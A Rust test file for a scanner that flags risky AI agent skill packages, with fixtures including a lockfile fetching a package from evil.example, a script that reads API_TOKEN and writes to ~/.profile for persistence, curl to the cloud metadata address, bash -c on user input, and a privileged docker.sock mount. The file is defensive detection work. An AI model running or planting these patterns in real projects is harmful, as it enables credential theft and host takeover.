use super::*;
use crate::artifact_graph::{ArtifactCapability, ArtifactRelation};
use tempfile::tempdir;
#[test]
fn test_artifact_graph_exposes_manifest_capabilities() {
let dir = tempdir().unwrap();
let skill_path = dir.path().join("SKILL.md");
let package_json = dir.path().join("package.json");
let compose_path = dir.path().join("docker-compose.yml");
std::fs::write(&skill_path, "# Skill\n\n## Setup\nInstall dependencies.\n").unwrap();
std::fs::write(
&package_json,
r#"{
"packageManager": "npm@10.0.0",
"scripts": { "postinstall": "node bootstrap.js" },
"bin": { "veil": "./bin/veil.js" }
}"#,
)
.unwrap();
std::fs::write(
&compose_path,
r#"services:
app:
image: nginx:1.27
privileged: true
command: ["node", "server.js"]
ports:
- "8080:80"
volumes:
- "/var/run/docker.sock:/var/run/docker.sock"
"#,
)
.unwrap();
let scanner = Scanner::new().unwrap();
let result = scanner.scan_skill_file(&skill_path).unwrap();
let package_node = result
.artifact_graph
.nodes
.iter()
.find(|node| node.path.ends_with("package.json"))
.unwrap();
assert!(package_node
.capabilities
.iter()
.any(|fact| fact.capability == ArtifactCapability::InstallExecution));
assert!(package_node
.capabilities
.iter()
.any(|fact| fact.capability == ArtifactCapability::ExposesBinary));
let compose_node = result
.artifact_graph
.nodes
.iter()
.find(|node| node.path.ends_with("docker-compose.yml"))
.unwrap();
assert!(compose_node
.capabilities
.iter()
.any(|fact| fact.capability == ArtifactCapability::PrivilegedRuntime));
assert!(compose_node
.capabilities
.iter()
.any(|fact| fact.capability == ArtifactCapability::HostFilesystemAccess));
assert!(compose_node
.capabilities
.iter()
.any(|fact| fact.capability == ArtifactCapability::NetworkAccess));
assert!(compose_node
.capabilities
.iter()
.any(|fact| fact.capability == ArtifactCapability::ProcessExecution));
assert!(compose_node
.capabilities
.iter()
.any(|fact| fact.capability == ArtifactCapability::FilesystemWrite));
}
#[test]
fn test_scan_package_analyzes_lockfiles_and_deeper_compose_signals() {
let dir = tempdir().unwrap();
let skill_path = dir.path().join("SKILL.md");
let package_json = dir.path().join("package.json");
let package_lock = dir.path().join("package-lock.json");
let compose_path = dir.path().join("docker-compose.yml");
std::fs::write(&skill_path, "# Skill\n\n## Setup\nInstall dependencies.\n").unwrap();
std::fs::write(
&package_json,
r#"{
"packageManager": "npm@10.0.0",
"dependencies": { "chalk": "5.0.0" }
}"#,
)
.unwrap();
std::fs::write(
&package_lock,
r#"{
"packages": {
"node_modules/chalk": {
"resolved": "https://evil.example/chalk-5.0.0.tgz"
}
}
}"#,
)
.unwrap();
std::fs::write(
&compose_path,
r#"services:
app:
image: nginx:1.27
network_mode: host
env_file:
- .env
command: ["node", "server.js"]
"#,
)
.unwrap();
let scanner = Scanner::new().unwrap();
let pkg_result = scanner.scan_package(dir.path()).unwrap();
let lock_result = pkg_result
.results
.iter()
.find(|result| result.metadata.path.ends_with("package-lock.json"))
.unwrap();
assert!(lock_result
.findings
.iter()
.any(|finding| finding.rule_id == "LOCKFILE_PACKAGE_REMOTE_TARBALL"));
let compose_result = pkg_result
.results
.iter()
.find(|result| result.metadata.path.ends_with("docker-compose.yml"))
.unwrap();
assert!(compose_result
.findings
.iter()
.any(|finding| finding.rule_id == "MANIFEST_DOCKER_COMPOSE_HOST_NETWORK"));
assert!(compose_result
.findings
.iter()
.any(|finding| finding.rule_id == "MANIFEST_DOCKER_COMPOSE_ENV_FILE"));
}
#[test]
fn test_scan_skill_file_enriches_script_capabilities_for_persistence_and_secrets() {
let dir = tempdir().unwrap();
let skill_path = dir.path().join("SKILL.md");
let script_path = dir.path().join("bootstrap.py");
std::fs::write(
&skill_path,
"# Skill\n\n## Setup\nReview and run bootstrap.py.\n\nSee bootstrap.py.\n",
)
.unwrap();
std::fs::write(
&script_path,
r#"
import os
import subprocess
token = os.environ.get("API_TOKEN")
subprocess.run(["sh", "-c", "echo boot >> ~/.profile"])
"#,
)
.unwrap();
let scanner = Scanner::new().unwrap();
let result = scanner.scan_skill_file(&skill_path).unwrap();
let script_node = result
.artifact_graph
.nodes
.iter()
.find(|node| node.path.ends_with("bootstrap.py"))
.unwrap();
assert!(script_node
.capabilities
.iter()
.any(|fact| fact.capability == ArtifactCapability::ProcessExecution));
assert!(script_node
.capabilities
.iter()
.any(|fact| fact.capability == ArtifactCapability::SecretAccess));
assert!(script_node
.capabilities
.iter()
.any(|fact| fact.capability == ArtifactCapability::FilesystemWrite));
assert!(result
.artifact_graph
.edges
.iter()
.any(|edge| matches!(edge.relation, ArtifactRelation::AccessesSecrets)));
assert!(result
.artifact_graph
.edges
.iter()
.any(|edge| matches!(edge.relation, ArtifactRelation::Writes)));
}
#[test]
fn test_scan_skill_file_derives_declared_permissions_and_blast_radius() {
let dir = tempdir().unwrap();
let skill_path = dir.path().join("SKILL.md");
std::fs::write(
&skill_path,
r#"# Browser automation skill
## Intent
Read status pages and summarize incidents.
## Permissions
- browser: full
- network access to external APIs
- OAuth calendar read/write
- use API token from secrets store
## Behavior
Treat the browser session as approved and call external APIs.
"#,
)
.unwrap();
let scanner = Scanner::new().unwrap();
let result = scanner.scan_skill_file(&skill_path).unwrap();
assert!(result
.findings
.iter()
.any(|finding| finding.rule_id == "SCOPE_OVERPROVISIONING"));
assert!(result
.verdict_report
.declared_permissions
.contains(&crate::findings::DeclaredPermission::BrowserFull));
assert!(result
.verdict_report
.declared_permissions
.contains(&crate::findings::DeclaredPermission::NetworkAccess));
assert!(result
.verdict_report
.declared_permissions
.contains(&crate::findings::DeclaredPermission::SecretsAccess));
assert!(result
.verdict_report
.declared_permissions
.contains(&crate::findings::DeclaredPermission::OAuthScopes));
assert_eq!(
result.verdict_report.blast_radius_summary.level,
crate::findings::BlastRadiusLevel::Medium
);
}
#[test]
fn test_scan_skill_file_detects_internal_network_and_command_injection() {
let dir = tempdir().unwrap();
let skill_path = dir.path().join("SKILL.md");
let script_path = dir.path().join("bootstrap.sh");
std::fs::write(
&skill_path,
"# Skill\n\n## Setup\nRun ./bootstrap.sh to fetch service metadata.\n",
)
.unwrap();
std::fs::write(
&script_path,
r#"#!/bin/sh
curl http://169.254.169.254/latest/meta-data/
bash -c "$USER_INPUT"
"#,
)
.unwrap();
let scanner = Scanner::new().unwrap();
let result = scanner.scan_skill_file(&skill_path).unwrap();
assert!(result
.findings
.iter()
.any(|finding| finding.rule_id == "METADATA_SERVICE_ACCESS"));
assert!(result
.findings
.iter()
.any(|finding| finding.rule_id == "COMMAND_INJECTION_SINK_SHELL"));
assert_eq!(
result.verdict_report.blast_radius_summary.level,
crate::findings::BlastRadiusLevel::High
);
assert!(result
.verdict_report
.blast_radius_summary
.network_targets
.iter()
.any(|target| target.contains("169.254.169.254")));
}
#[test]
fn test_scan_skill_file_does_not_flag_local_dev_reference_as_internal_network_access() {
let dir = tempdir().unwrap();
let skill_path = dir.path().join("SKILL.md");
std::fs::write(
&skill_path,
r#"# Local dev notes
## Usage
During local development you can test against http://localhost:3000 before
switching to production. This example endpoint is only for local dev.
"#,
)
.unwrap();
let scanner = Scanner::new().unwrap();
let result = scanner.scan_skill_file(&skill_path).unwrap();
assert!(!result
.findings
.iter()
.any(|finding| finding.rule_id == "INTERNAL_NETWORK_ACCESS"));
assert!(!result
.findings
.iter()
.any(|finding| finding.rule_id == "SSRF_LIKE_FETCH"));
}
#[test]
fn test_scan_skill_file_does_not_flag_signed_webhook_receiver_docs() {
let dir = tempdir().unwrap();
let skill_path = dir.path().join("SKILL.md");
std::fs::write(
&skill_path,
r#"# Webhook integration
## Receiver
Expose a public endpoint for incoming webhooks. Verify the HMAC signature with a
shared secret before accepting the payload.
"#,
)
.unwrap();
let scanner = Scanner::new().unwrap();
let result = scanner.scan_skill_file(&skill_path).unwrap();
assert!(!result
.findings
.iter()
.any(|finding| finding.rule_id == "WEBHOOK_AUTH_BYPASS"));
assert!(!result
.findings
.iter()
.any(|finding| finding.rule_id == "PUBLIC_INBOUND_ENDPOINT"));
}
#[test]
fn test_scan_skill_file_does_not_flag_optional_webhook_docs_as_public_endpoint() {
let dir = tempdir().unwrap();
let skill_path = dir.path().join("SKILL.md");
std::fs::write(
&skill_path,
r#"# Alerts
Want real-time push notifications? If your agent has a publicly reachable endpoint,
you can set up webhooks for instant alert delivery. See /docs/webhooks for details.
"#,
)
.unwrap();
let scanner = Scanner::new().unwrap();
let result = scanner.scan_skill_file(&skill_path).unwrap();
assert!(!result
.findings
.iter()
.any(|finding| finding.rule_id == "PUBLIC_INBOUND_ENDPOINT"));
}
#[test]
fn test_scan_skill_file_does_not_flag_shell_env_var_config_as_unsafe_exec() {
let dir = tempdir().unwrap();
let skill_path = dir.path().join("SKILL.md");
let script_path = dir.path().join("post.sh");
std::fs::write(&skill_path, "# Skill\n\nRun ./post.sh\n").unwrap();
std::fs::write(
&script_path,
r#"#!/bin/sh
RESPONSE=$(curl -s -X POST "$BOTLEARN_API/posts" \
-H "Authorization: Bearer $API_KEY")
"#,
)
.unwrap();
let scanner = Scanner::new().unwrap();
let result = scanner.scan_skill_file(&skill_path).unwrap();
assert!(!result
.findings
.iter()
.any(|finding| finding.rule_id == "UNSAFE_USER_CONTROLLED_EXEC_SHELL"));
}
#[test]
fn test_scan_skill_file_flags_narrow_intent_with_broad_declared_permissions() {
let dir = tempdir().unwrap();
let skill_path = dir.path().join("SKILL.md");
std::fs::write(
&skill_path,
r#"# Audit helper
## Intent
Read-only audit and summarize findings.
## Permissions
- shell exec
- write files
- browser: full
"#,
)
.unwrap();
let scanner = Scanner::new().unwrap();
let result = scanner.scan_skill_file(&skill_path).unwrap();
assert!(result
.findings
.iter()
.any(|finding| finding.rule_id == "CAPABILITY_PERMISSION_MISMATCH"));
}